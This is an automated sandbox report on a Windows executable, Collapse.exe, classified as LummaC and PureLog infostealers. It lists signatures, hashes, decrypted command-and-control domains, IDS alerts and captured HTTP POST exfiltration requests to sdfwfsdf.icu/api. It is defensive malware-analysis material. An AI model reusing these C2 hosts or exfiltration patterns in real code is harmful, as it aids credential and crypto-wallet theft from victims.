
Windows Analysis Report
Collapse.exe

Overview

General Information

Sample name: Collapse.exe
Analysis ID: 1630105
MD5: 04eacc602d626eba16224fdc15ef8aa5
SHA1: b34ada743e5e4ed6b34ae2894b057f8df75efb71
SHA256: 6ac6fce5dddcd7e72952ba3c2e36e92c5c4aac45e2b5226060421193e882d996
Tags: exe, spyware, user-edv

Detection

LummaC Stealer, PureLog Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Collapse.exe (PID: 4760 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 04EACC602D626EBA16224FDC15EF8AA5)
    • Collapse.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\Collapse.exe" MD5: 04EACC602D626EBA16224FDC15EF8AA5)
    • WerFault.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": ["sdfwfsdf.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "LPnhqo--qnhtzqcrazyg"}
Source | Rule | Description | Author
Collapse.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000001.00000002.3294762708.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000000.2033769866.0000000000F42000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
1.2.Collapse.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
1.2.Collapse.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.0.Collapse.exe.f40000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Collapse.exe.42f9550.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.2.Collapse.exe.42f9550.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
                          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T14:57:19.214933+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 149.154.167.99 | 443 | TCP
2025-03-05T14:57:20.010753+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.954670+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:24.255162+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:25.813429+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:28.170505+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:32.599119+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:33.820271+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49722 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:37.205618+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.449792+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:23.516026+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:39.257381+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:22.449792+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2025-03-05T14:57:27.573571+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49714 | 188.114.97.3 | 443 | TCP

                          AV Detection

Source: phygcsforum.life | Avira URL Cloud: Label: malware
Source: moderzysics.top | Avira URL Cloud: Label: malware
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["sdfwfsdf.icu", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "LPnhqo--qnhtzqcrazyg"}
Source: Collapse.exe | Virustotal: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 90.3% probability
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: sdfwfsdf.icu
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: explorebieology.run
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: gadgethgfub.icu
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: moderzysics.top
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: techmindzs.live
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: codxefusion.top
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: phygcsforum.life
Source: 00000000.00000002.2234523849.00000000042F9000.00000004.00000800.00020000.00000000.sdmp | String decryptor: techspherxe.top
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0041BF19 CryptUnprotectData | 1_2_0041BF19
Source: Collapse.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: Collapse.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: Politic.pdb source: Collapse.exe, WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: Politic.pdb$FXn source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb) source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.ni.pdb source: WER6334.tmp.dmp.4.dr
                          Source: Binary string: System.pdb source: WER6334.tmp.dmp.4.dr
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h | 1_2_0044F0C0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx eax, byte ptr [esp+edx+5D5425F6h] | 1_2_0044F1E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov ebp, edx | 1_2_0044F1E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], A18B8074h | 1_2_00413181
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov byte ptr [esi], cl | 1_2_00439DBD
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx eax, di | 1_2_004316C0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov esi, ecx | 1_2_00411F4E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 1_2_0041AF10
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then jmp ecx | 1_2_0041BF19
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0000027Ch] | 1_2_00438033
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov byte ptr [ebx], cl | 1_2_00438033
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 1_2_0042A830
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h | 1_2_0044B030
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh | 1_2_00421089
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-4CC3DB68h] | 1_2_0044D0B0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then jmp eax | 1_2_004329D3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 1_2_004329D3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh | 1_2_004019E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-0584F30Bh] | 1_2_0044D9E0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+edx] | 1_2_0044BA00
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 1_2_0040A220
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 1_2_0040A220
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh | 1_2_0044FAE0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+14h] | 1_2_0040CA90
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+14h] | 1_2_0040CA90
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov word ptr [ebx], ax | 1_2_0040CA90
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov ebx, eax | 1_2_0044EAA2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-2BD786AEh] | 1_2_0044C35E
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_00433B12
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp word ptr [esi], 0025h | 1_2_00448320
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 744E5843h | 1_2_0044AB30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then jmp eax | 1_2_0040DBE2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 1_2_00435B80
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 18A944CDh | 1_2_0041F3B0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then jmp ecx | 1_2_00420C28
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h | 1_2_00421C30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7Ah] | 1_2_00421C30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2202074Ch] | 1_2_00421C30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 1_2_00421C30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp word ptr [ebx+eax], 0000h | 1_2_00423C35
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_00433CE3
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28h] | 1_2_00431CF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000080h] | 1_2_00431CF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 1_2_00431CF0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then add ecx, 02h | 1_2_0041FD48
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+16B9028Eh] | 1_2_0041FD48
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov dword ptr [esp+08h], edx | 1_2_00425510
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+46h] | 1_2_00431D10
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov esi, ebp | 1_2_0042FDC0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-00000086h] | 1_2_0042FDC0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax+2465CAC4h] | 1_2_0040DDB5
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movsx ecx, byte ptr [esi+eax] | 1_2_0041AE40
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov dword ptr [esp+04h], edi | 1_2_0044BE0B
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h | 1_2_0042AE30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h | 1_2_0042AE30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov word ptr [edx], ax | 1_2_004246A4
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 1_2_00402750
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then jmp ecx | 1_2_0041BF63
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+04h] | 1_2_00422F20
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov word ptr [eax], cx | 1_2_00422F20
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx eax, byte ptr [esp+ecx] | 1_2_0044AF20
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then mov byte ptr [eax], bl | 1_2_00410F30
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 1_2_004437D0
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h | 1_2_0044F780

                          Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49714 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49728 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: sdfwfsdf.icu
Source: Malware configuration extractor | URLs: explorebieology.run
Source: Malware configuration extractor | URLs: gadgethgfub.icu
Source: Malware configuration extractor | URLs: moderzysics.top
Source: Malware configuration extractor | URLs: techmindzs.live
Source: Malware configuration extractor | URLs: codxefusion.top
Source: Malware configuration extractor | URLs: phygcsforum.life
Source: Malware configuration extractor | URLs: techspherxe.top
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 149.154.167.99
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 149.154.167.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49719 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: GET /kz_prokla1 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: t.me
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 55 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QPW26Q0V | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12784 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=H1A60BTFA8F6 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15050 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ABMGTG0TZ38JKITKD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20570 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QAK4EBFCG4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2686 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9ZSKVYPZ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 570494 | Host: sdfwfsdf.icu
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 89 | Host: sdfwfsdf.icu
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: global traffic | DNS traffic detected: DNS query: sdfwfsdf.icu
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sdfwfsdf.icu
                          Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/0y
                          Source: Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/4
                          Source: Collapse.exe, 00000001.00000002.3295743874.0000000001733000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/api
                          Source: Collapse.exe, 00000001.00000002.3295956102.0000000001757000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/apiuo
                          Source: Collapse.exe, 00000001.00000002.3295516080.00000000016E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/r
                          Source: Collapse.exe, 00000001.00000002.3295883257.0000000001746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdfwfsdf.icu/z
                          Source: Collapse.exe, 00000001.00000002.3294948894.000000000135B000.00000004.00000010.00020000.00000000.sdmp, Collapse.exe, 00000001.00000002.3295294937.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/kz_prokla1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00441800 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard | 1_2_00441800 (2 occurrences)
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_03B41000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber | 1_2_03B41000
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_01950870
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_01950860
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 0_2_01952D20
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_00439832
Source: C:\Users\user\Desktop\Collapse.exe | Code function: 1_2_0040D0D1
